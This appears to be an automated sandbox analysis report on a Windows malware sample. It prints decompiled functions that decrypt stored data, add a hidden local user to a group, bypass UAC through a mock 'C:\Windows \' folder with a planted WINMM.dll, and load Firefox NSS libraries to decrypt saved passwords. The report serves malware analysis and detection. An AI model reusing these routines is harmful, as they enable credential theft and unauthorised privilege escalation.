                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0040C23A,?,00000000,?,?,?,?,0040C1A9), ref: 0040C2A0
                                  • LocalFree.KERNEL32(0040C23A,?,?,?,?,?,0040C23A,?,00000000,?,?,?,?,0040C1A9), ref: 0040C2C0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 14d5045bb1e80aca1f29e39f07986aad29e0176d729f2c70d7d51fb657e4aaa2
                                  • Instruction ID: 1d902f39b8868da73aad002a3a3bcb34f53c3eebdb7f7a81f2f30e2d950ee71b
                                  • Opcode Fuzzy Hash: 14d5045bb1e80aca1f29e39f07986aad29e0176d729f2c70d7d51fb657e4aaa2
                                  • Instruction Fuzzy Hash: 4C0108B9900209AFDB059FA4DC4A8EFBBB9EB48310B10016EFD41A2350E7759A448AA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411446, Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00411446(void* __ecx, void* __eflags, WCHAR* _a4) {
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v56;
				struct _WIN32_FIND_DATAW _v648;
				intOrPtr _t39;
				void* _t62;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t79;

				_v20 = _v20 & 0x00000000;
				_t39 = 5;
				_t75 = __ecx;
				_v16 = _t39;
				_v24 = _t39;
				E004018C7( &_v28, __eflags);
				_t62 = FindFirstFileW(_a4,  &_v648);
				_t79 = _t62 - 0xffffffff;
				while(_t79 != 0) {
					_v56 = _v56 & 0x00000000;
					__eflags = _v648.dwFileAttributes & 0x00000010;
					if((_v648.dwFileAttributes & 0x00000010) == 0) {
						_t16 =  &_v40;
						 *_t16 = _v40 & 0x00000000;
						__eflags =  *_t16;
						_v48 = _v648.nFileSizeLow;
						_v44 = _v648.nFileSizeHigh;
					} else {
						asm("xorps xmm0, xmm0");
						_v40 = 1;
						asm("movlpd [ebp-0x2c], xmm0");
					}
					E00403549( &_v56, E004036F7( &_v12,  &(_v648.cFileName)));
					E00405FEB(_v12);
					_v12 = _v12 & 0x00000000;
					_t77 = _t77 - 0x18;
					_t76 = _t77;
					E0040373F(_t76,  &_v56);
					 *((intOrPtr*)(_t76 + 8)) = _v48;
					 *((intOrPtr*)(_t76 + 0xc)) = _v44;
					 *(_t76 + 0x10) = _v40;
					E004017C8( &_v28);
					E00405FEB(_v56);
					__eflags = FindNextFileW(_t62,  &_v648);
				}
				E004013B3(_t75, _t79,  &_v28);
				_t73 = _v28;
				if(_v28 != 0) {
					E00401B27(_t73, _t73);
				}
				E00405FEB(_a4);
				return _t75;
			}



















                                  0x0041144f
                                  0x00411458
                                  0x00411459
                                  0x0041145b
                                  0x00411461
                                  0x00411464
                                  0x00411479
                                  0x0041147b
                                  0x0041151d
                                  0x00411483
                                  0x00411487
                                  0x0041148e
                                  0x004114ad
                                  0x004114ad
                                  0x004114ad
                                  0x004114b1
                                  0x004114b4
                                  0x00411490
                                  0x00411490
                                  0x00411493
                                  0x0041149a
                                  0x0041149a
                                  0x004114ca
                                  0x004114d2
                                  0x004114d7
                                  0x004114de
                                  0x004114e1
                                  0x004114e6
                                  0x004114f1
                                  0x004114f7
                                  0x004114fd
                                  0x00411500
                                  0x00411508
                                  0x0041151b
                                  0x0041151b
                                  0x00411529
                                  0x0041152e
                                  0x00411533
                                  0x00411536
                                  0x00411536
                                  0x0041153e
                                  0x00411549

                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?,?,?), ref: 00411473
                                  • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 00411515
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$FirstNext
                                  • String ID:
                                  • API String ID: 1690352074-0
                                  • Opcode ID: ba9f4767d7951abe804ed14a5dde93c13626e19fe6767dc0f9c07e78e5a06133
                                  • Instruction ID: 3bc00f6ecbb92e03070013b76739fb9faa3866cd32c5f18363a362d6e3315d9a
                                  • Opcode Fuzzy Hash: ba9f4767d7951abe804ed14a5dde93c13626e19fe6767dc0f9c07e78e5a06133
                                  • Instruction Fuzzy Hash: FF315071D00209ABCB10EFA5C989BEEBBB9EF44315F10416EE505B3290DB789A84CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D2B8, Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0040D2B8(char _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				void _v36;
				void* _t22;
				intOrPtr* _t25;
				signed int _t30;
				intOrPtr* _t38;

				_t38 = _a4;
				_t30 = 8;
				memset( &_v36, 0, _t30 << 2);
				_v36 =  *_t38;
				_v24 = 1;
				_v20 = 0;
				_v32 =  *_a8;
				_t22 =  &_v36;
				_v16 = 0;
				_v12 = 0x10201;
				_v8 = 0;
				__imp__NetUserAdd(0, 1, _t22, 0);
				_t42 = _t22;
				if(_t22 != 0) {
					L3:
					__eflags = 0;
					return 0;
				}
				_a4 =  *_t38;
				_t25 = E00410A8C( &_a8, _t42);
				__imp__NetLocalGroupAddMembers(0,  *_t25, 3,  &_a4, 1);
				E00405FEB(_a8);
				if(_t25 != 0) {
					goto L3;
				}
				return 1;
			}














                                  0x0040d2c0
                                  0x0040d2c8
                                  0x0040d2ce
                                  0x0040d2d4
                                  0x0040d2dc
                                  0x0040d2df
                                  0x0040d2e4
                                  0x0040d2e7
                                  0x0040d2ed
                                  0x0040d2f0
                                  0x0040d2f7
                                  0x0040d2fa
                                  0x0040d300
                                  0x0040d302
                                  0x0040d333
                                  0x0040d333
                                  0x00000000
                                  0x0040d333
                                  0x0040d309
                                  0x0040d30c
                                  0x0040d31b
                                  0x0040d326
                                  0x0040d32d
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,0055AD78,?,?,?,0040E4D4,0055AD74,0055AD78), ref: 0040D2FA
                                    • Part of subcall function 00410A8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D311,?,?,00000001), ref: 00410AE1
                                    • Part of subcall function 00410A8C: LookupAccountSidW.ADVAPI32(00000000,0040D311,?,00000104,?,00000010,?), ref: 00410B06
                                    • Part of subcall function 00410A8C: GetLastError.KERNEL32(?,?,00000001), ref: 00410B10
                                    • Part of subcall function 00410A8C: FreeSid.ADVAPI32(0040D311,?,?,00000001), ref: 00410B1E
                                  • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0040E4D4,0055AD74,0055AD78), ref: 0040D31B
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                  • String ID:
                                  • API String ID: 188019324-0
                                  • Opcode ID: 8f238fb056e29698dfd204066f020e4d6850e83beaf88bf6cfc79c9a303f5c87
                                  • Instruction ID: 387118251825923e10dc775986f69852a0c78a11b32ac12897eb8a3676ac3e91
                                  • Opcode Fuzzy Hash: 8f238fb056e29698dfd204066f020e4d6850e83beaf88bf6cfc79c9a303f5c87
                                  • Instruction Fuzzy Hash: 56112E72D00208AFDB11DFA9C8849EEB7F8FF58354B00842BF951E7250D7B49A458B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00426222, Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                  • Instruction ID: 2f4a3529709998775fb1cfce15acb4dc74d0562c3152b173c983c6aefab5c3d4
                                  • Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                  • Instruction Fuzzy Hash: F0317976F0062ADFCB04DF98D8909AEB7F5BF89314B6681AAD401A7311D234E941CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410E5E, Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E00410E5E(char __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				void* _v12;
				char _v28;
				char _v60;
				char _v76;
				char _v92;
				char _t23;
				char* _t34;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t50;
				intOrPtr _t52;
				char _t53;
				intOrPtr* _t59;
				void* _t60;

				_t50 = __edx;
				asm("movaps xmm0, [0x41a8f0]");
				_push(_t38);
				_v12 = __ecx;
				_t52 = 0x80000000;
				_push(_t38);
				asm("cpuid");
				asm("movups [ebp-0x18], xmm0");
				_t40 =  &_v28;
				 *_t40 = 0x80000000;
				 *((intOrPtr*)(_t40 + 4)) = _t38;
				 *((intOrPtr*)(_t40 + 8)) = 0;
				 *((intOrPtr*)(_t40 + 0xc)) = __edx;
				_t23 = _v28;
				_v8 = _t23;
				if(_t23 >= 0x80000000) {
					do {
						_push(_t40);
						asm("cpuid");
						_t59 = _t40;
						_t40 =  &_v28;
						 *_t40 = _t52;
						 *((intOrPtr*)(_t40 + 4)) = _t59;
						 *((intOrPtr*)(_t40 + 8)) = 0;
						 *((intOrPtr*)(_t40 + 0xc)) = _t50;
						if(_t52 != 0x80000002) {
							__eflags = _t52 - 0x80000003;
							if(_t52 != 0x80000003) {
								__eflags = _t52 - 0x80000004;
								if(_t52 == 0x80000004) {
									_push(0x10);
									_push( &_v28);
									_t34 =  &_v60;
									goto L7;
								}
							} else {
								_push(0x10);
								_push( &_v28);
								_t34 =  &_v76;
								goto L7;
							}
						} else {
							_push(0x10);
							_push(_t40);
							_t34 =  &_v92;
							L7:
							_push(_t34);
							E0040102C();
							_t60 = _t60 + 0xc;
						}
						_t52 = _t52 + 1;
						_t64 = _t52 - _v8;
					} while (_t52 <= _v8);
				}
				_t57 = E00401085(0x200);
				E0040102C(_t24,  &_v92, 0x40);
				_t53 = _v12;
				E004031AF(E004034D1( &_v12, _t57), _t64, _t53);
				E00405FEB(_v12);
				E00401099(_t57);
				return _t53;
			}


















                                  0x00410e5e
                                  0x00410e64
                                  0x00410e6b
                                  0x00410e6e
                                  0x00410e71
                                  0x00410e7a
                                  0x00410e7b
                                  0x00410e7f
                                  0x00410e84
                                  0x00410e87
                                  0x00410e89
                                  0x00410e8c
                                  0x00410e8f
                                  0x00410e92
                                  0x00410e95
                                  0x00410e9a
                                  0x00410e9c
                                  0x00410ea0
                                  0x00410ea1
                                  0x00410ea3
                                  0x00410ea6
                                  0x00410ea9
                                  0x00410eab
                                  0x00410eae
                                  0x00410eb1
                                  0x00410eba
                                  0x00410ec6
                                  0x00410ecc
                                  0x00410ed9
                                  0x00410edf
                                  0x00410ee4
                                  0x00410ee6
                                  0x00410ee7
                                  0x00000000
                                  0x00410ee7
                                  0x00410ece
                                  0x00410ed1
                                  0x00410ed3
                                  0x00410ed4
                                  0x00000000
                                  0x00410ed4
                                  0x00410ebc
                                  0x00410ebe
                                  0x00410ec0
                                  0x00410ec1
                                  0x00410eea
                                  0x00410eea
                                  0x00410eeb
                                  0x00410ef0
                                  0x00410ef0
                                  0x00410ef3
                                  0x00410ef4
                                  0x00410ef4
                                  0x00410e9c
                                  0x00410f03
                                  0x00410f0c
                                  0x00410f11
                                  0x00410f23
                                  0x00410f2b
                                  0x00410f31
                                  0x00410f3d

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 78007187c664fe2b21c5d2402a854018bce6746188df8b1805fe44db4e2c4551
                                  • Instruction ID: 82469f1c0b68b0bbf684dc2258c46a30b897b832454fe873a7492cc4e91153ea
                                  • Opcode Fuzzy Hash: 78007187c664fe2b21c5d2402a854018bce6746188df8b1805fe44db4e2c4551
                                  • Instruction Fuzzy Hash: 8021D871E002099BDB11DF99CC82AEFBBB8EF44314F14447BE605FB241E67469C58BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041EB27, Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                  • Instruction ID: 252c24ed45863d0043dcfa88564879008cf283e5d062384433913211211ca2ab
                                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                  • Instruction Fuzzy Hash: E331E63AA0834A8FC710DF19C480967B7E5FF89314F4909AEE99687312D334F986CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411B3F, Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00411B3F() {
				intOrPtr* _t10;
				intOrPtr* _t11;

				_t10 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14;
				_t11 =  *_t10;
				while(_t11 != _t10) {
					if(E00411BFD( *((intOrPtr*)(_t11 + 0x28))) == 0) {
						return  *((intOrPtr*)(_t11 + 0x10));
					}
					_t11 =  *_t11;
				}
				return 0;
			}





                                  0x00411b4a
                                  0x00411b4d
                                  0x00411b5f
                                  0x00411b5b
                                  0x00000000
                                  0x00411b68
                                  0x00411b5d
                                  0x00411b5d
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                  • Instruction ID: 857fa1df320f071ac117177b4bc81004f99221c297faafc14dd0d3c935e2cdac
                                  • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                  • Instruction Fuzzy Hash: 06E0C233608510CBC760DB19D4009D6F3F6EF9037072A046AE65BA3631E328FC82C758
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411E6D, Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00411E6D() {
				intOrPtr _t4;

				_t4 =  *[fs:0x30];
				if(_t4 == 0) {
					return 0;
				} else {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t4 + 0xc)) + 0xc)))))) + 0x18));
				}
			}




                                  0x00411e6d
                                  0x00411e75
                                  0x00411e87
                                  0x00411e77
                                  0x00411e84
                                  0x00411e84

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                  • Instruction ID: b4343b720a6aa60280e87e62ebe2b10670a5d6abc93b7d24aa6a6a1121a5b049
                                  • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                  • Instruction Fuzzy Hash: 8AD0EA38361A408FCB51CF18C584E01B3E4EB49760B098491E905CB735DB38EC40EA40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411B38, Relevance: .0, Instructions: 2COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00411B38() {

				return  *[fs:0x30];
			}



                                  0x00411b3e

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412F55, Relevance: 59.7, APIs: 23, Strings: 11, Instructions: 151fileregistrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 18%
                                  			E00412F55(void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				struct _SHELLEXECUTEINFOW _v76;
				short _v2124;
				short _v4172;
				char _v6220;
				void* _t63;
				void* _t69;
				void* _t72;
				void* _t80;
				void* _t81;

				E004011C0(0x1848, _t72);
				if(E0041111B() != 1) {
					CloseHandle( *0x559cb0);
					E00401052( &_v76, 0, 0x3c);
					_v8 = 0;
					__imp__Wow64DisableWow64FsRedirection( &_v8);
					E00401052( &_v6220, 0, 0x800);
					GetModuleFileNameW(0,  &_v6220, 0x800);
					E00401052( &_v2124, 0, 0x800);
					GetSystemDirectoryW( &_v2124, 0x800);
					lstrcatW( &_v2124, L"\\winSAT.exe");
					E00401052( &_v4172, 0, 0x800);
					GetSystemDirectoryW( &_v4172, 0x800);
					lstrcatW( &_v4172, L"\\winmm.dll");
					CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
					CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
					CopyFileW( &_v2124, L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", 0);
					CopyFileW( &_v4172, L"\\\\?\\C:\\Windows \\System32\\winmmd.dll", 0);
					_t80 = E00412F0D(_t72);
					RegSetValueExW(_t80, L"Virtual Machine Platform", 0, 1,  &_v6220, 0x1000);
					RegCloseKey(_t80);
					__imp__IsWow64Process(GetCurrentProcess(),  &_v12);
					_push(0);
					_push(0);
					_push(2);
					_push(0);
					_push(0);
					_push(0x40000000);
					_push(L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");
					if(_v12 != 0) {
						_t63 = CreateFileW();
						_push(0);
						_t81 = _t63;
						_push( &_v16);
						_push(0x3000);
						_push(0x420408);
					} else {
						_t69 = CreateFileW();
						_push(0);
						_t81 = _t69;
						_push( &_v16);
						_push(0x2e00);
						_push(0x423408);
					}
					WriteFile(_t81, ??, ??, ??, ??);
					CloseHandle(_t81);
					_v76.cbSize = 0x3c;
					_v76.lpFile = L"C:\\Windows \\System32\\winSAT.exe";
					_v76.lpParameters = L"formal";
					_v76.nShow = 0;
					_v76.hwnd = 0;
					_v76.lpDirectory = 0;
					ShellExecuteExW( &_v76);
					__imp__Wow64RevertWow64FsRedirection(_v8);
					Sleep(0x7d0);
					ExitProcess(0);
				}
				return 0;
			}















                                  0x00412f5d
                                  0x00412f6d
                                  0x00412f7f
                                  0x00412f8a
                                  0x00412f92
                                  0x00412f99
                                  0x00412fad
                                  0x00412fbe
                                  0x00412fcd
                                  0x00412fe3
                                  0x00412ff7
                                  0x00413007
                                  0x0041301b
                                  0x00413029
                                  0x00413039
                                  0x00413041
                                  0x00413056
                                  0x00413065
                                  0x0041306c
                                  0x00413083
                                  0x0041308a
                                  0x0041309b
                                  0x004130a1
                                  0x004130a2
                                  0x004130a3
                                  0x004130a5
                                  0x004130a6
                                  0x004130a7
                                  0x004130ac
                                  0x004130b4
                                  0x004130cf
                                  0x004130d5
                                  0x004130d6
                                  0x004130db
                                  0x004130dc
                                  0x004130e1
                                  0x004130b6
                                  0x004130b6
                                  0x004130bc
                                  0x004130bd
                                  0x004130c2
                                  0x004130c3
                                  0x004130c8
                                  0x004130c8
                                  0x004130e7
                                  0x004130ee
                                  0x004130f3
                                  0x004130fb
                                  0x00413102
                                  0x00413109
                                  0x0041310c
                                  0x0041310f
                                  0x00413112
                                  0x0041311b
                                  0x00413126
                                  0x0041312d
                                  0x0041312d
                                  0x00413139

                                  APIs
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                  • CloseHandle.KERNEL32(?), ref: 00412F7F
                                  • Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                  • lstrcatW.KERNEL32 ref: 00412FF7
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                  • lstrcatW.KERNEL32 ref: 00413029
                                  • CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                  • CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                  • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                  • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                    • Part of subcall function 00412F0D: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,767182ED,766F13E0,?,?,0041306C), ref: 00412F2C
                                    • Part of subcall function 00412F0D: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                  • RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                  • IsWow64Process.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041309B
                                  • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130B6
                                  • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130CF
                                  • WriteFile.KERNEL32(00000000,00420408,00003000,?,00000000), ref: 004130E7
                                  • CloseHandle.KERNEL32(00000000), ref: 004130EE
                                  • ShellExecuteExW.SHELL32(?), ref: 00413112
                                  • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0041311B
                                  • Sleep.KERNEL32(000007D0), ref: 00413126
                                  • ExitProcess.KERNEL32 ref: 0041312D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateProcessWow64$CloseDirectory$Handle$CopyCurrentOpenRedirectionSystemTokenlstrcat$DisableExecuteExitInformationModuleNameRevertShellSleepValueWrite
                                  • String ID: <$C:\Windows \System32\winSAT.exe$Virtual Machine Platform$\\?\C:\Windows \$\\?\C:\Windows \System32$\\?\C:\Windows \System32\WINMM.dll$\\?\C:\Windows \System32\winSAT.exe$\\?\C:\Windows \System32\winmmd.dll$\winSAT.exe$\winmm.dll$formal
                                  • API String ID: 371289168-2038174052
                                  • Opcode ID: 030c532d15d01d55ddb18d83e7d6d465989f293f85a1660a9534233c15bfab61
                                  • Instruction ID: 38432614936820ae09a91b85de116fe05e5ca363bce1e2b84a591d1acda27bec
                                  • Opcode Fuzzy Hash: 030c532d15d01d55ddb18d83e7d6d465989f293f85a1660a9534233c15bfab61
                                  • Instruction Fuzzy Hash: E9413371940258BBDB219BE1DC49ECF7FBCEF45710F104066F605E2190DB785A85CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ADE3, Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219libraryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E0040ADE3(void* __ecx, void* __edx, WCHAR* _a4) {
				WCHAR* _v8;
				long _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				char _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				short _v560;
				struct HINSTANCE__* _t135;
				WCHAR* _t158;
				intOrPtr _t194;
				void* _t206;
				void* _t216;
				void* _t218;

				_t206 = __edx;
				_t158 = 0;
				_t216 = __ecx;
				E00401052( &_v560, 0, 0x104);
				GetCurrentDirectoryW(0x104,  &_v560);
				SetCurrentDirectoryW(_a4);
				E0040357C( &_a4, _t206, 0, "\\");
				E0040373F( &_v40,  &_a4);
				E0040357C( &_v40, _t206, 0, L"nss3.dll");
				E0040373F( &_v20,  &_a4);
				E0040357C( &_v20, _t206, 0, L"msvcr120.dll");
				E0040373F( &_v16,  &_a4);
				E0040357C( &_v16, _t206, 0, L"msvcp120.dll");
				E0040373F( &_v36,  &_a4);
				E0040357C( &_v36, _t206, 0, L"mozglue.dll");
				E0040373F( &_v32,  &_a4);
				E0040357C( &_v32, _t206, 0, L"softokn3.dll");
				E0040373F( &_v28,  &_a4);
				E0040357C( &_v28, _t206, 0, L"msvcp");
				E0040373F( &_v24,  &_a4);
				E0040357C( &_v24, _t206, 0, L"msvcr");
				_t218 = 0x5a;
				_v12 = 0x104;
				while(1) {
					E0040373F( &_v8,  &_v28);
					E0040357C(E00403384( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
					if(PathFileExistsW(_v8) != 0) {
						break;
					}
					_v12 = _v12 + 0xa;
					E00405FEB(_v8);
					_t224 = _v12 - 0x96;
					_v8 = _t158;
					if(_v12 != 0x96) {
						continue;
					} else {
						while(1) {
							L5:
							E0040373F( &_v8,  &_v24);
							E0040357C(E00403384( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
							if(PathFileExistsW(_v8) != 0) {
								break;
							}
							_t218 = _t218 + 0xa;
							E00405FEB(_v8);
							_v8 = _t158;
							if(_t218 != 0x96) {
								continue;
							}
							L9:
							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);
							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);
							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);
							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);
							_t135 = LoadLibraryW(_v32);
							 *(_t216 + 0xb8) = _t135;
							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
								if(_t194 != 0) {
									_t230 = _t135;
									if(_t135 != 0) {
										_push(_t194);
										 *((intOrPtr*)(_t216 + 0x68)) = E00411E88(_t194, "NSS_Init", _t230);
										 *((intOrPtr*)(_t216 + 0x80)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
										 *((intOrPtr*)(_t216 + 0x7c)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
										 *((intOrPtr*)(_t216 + 0x70)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
										 *((intOrPtr*)(_t216 + 0x74)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
										 *((intOrPtr*)(_t216 + 0x78)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
										 *((intOrPtr*)(_t216 + 0x6c)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
										 *((intOrPtr*)(_t216 + 0x84)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
